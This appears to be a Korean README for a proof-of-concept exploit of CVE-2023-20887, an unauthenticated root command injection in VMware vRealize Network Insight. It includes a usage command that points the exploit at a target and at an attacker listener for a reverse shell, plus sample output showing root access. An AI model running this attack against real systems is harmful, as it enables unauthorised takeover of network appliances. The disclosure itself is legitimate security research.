
VMWare vRealize Network Insight 사전 인증 RCE (CVE-2023-20887)
CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight)의 인증되지 않은 RCE를 위한 POC
이 취약점의 근본 원인 분석은 제 블로그에서 확인할 수 있습니다: https://kushagraojha.medium.com/vmware-vrealize-network-insight-cve-2023-20887-193f3c3d30a0
VMWare Aria Operations for Networks (vRealize Network Insight)는 Apache Thrift RPC 인터페이스를 통해 사용자 입력을 받을 때 명령 주입에 취약합니다. 이 취약점으로 인해 원격의 인증되지 않은 공격자가 기본 운영 체제에서 root 사용자로 임의의 명령을 실행할 수 있습니다. RPC 인터페이스는 우회 가능한 리버스 프록시로 보호됩니다. VMware는 이 문제의 심각도를 Critical 등급으로 평가했으며 최대 CVSSv3 기본 점수는 9.8입니다. 악의적인 공격자는 어플라이언스에서 'root' 컨텍스트로 원격 코드 실행을 얻을 수 있습니다. VMWare 6.x 버전이 취약합니다.
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release
최신 버전으로 업데이트하거나 Progress Advisory의 지침을 따라 완화하십시오.
이 소프트웨어는 순수하게 학술 연구 및 효과적인 방어 기술 개발 목적으로 제작되었으며, 명시적으로 승인된 경우를 제외하고 시스템 공격에 사용할 목적이 아닙니다. 프로젝트 유지 관리자는 소프트웨어의 오용에 대해 책임지지 않습니다. 책임감 있게 사용하십시오.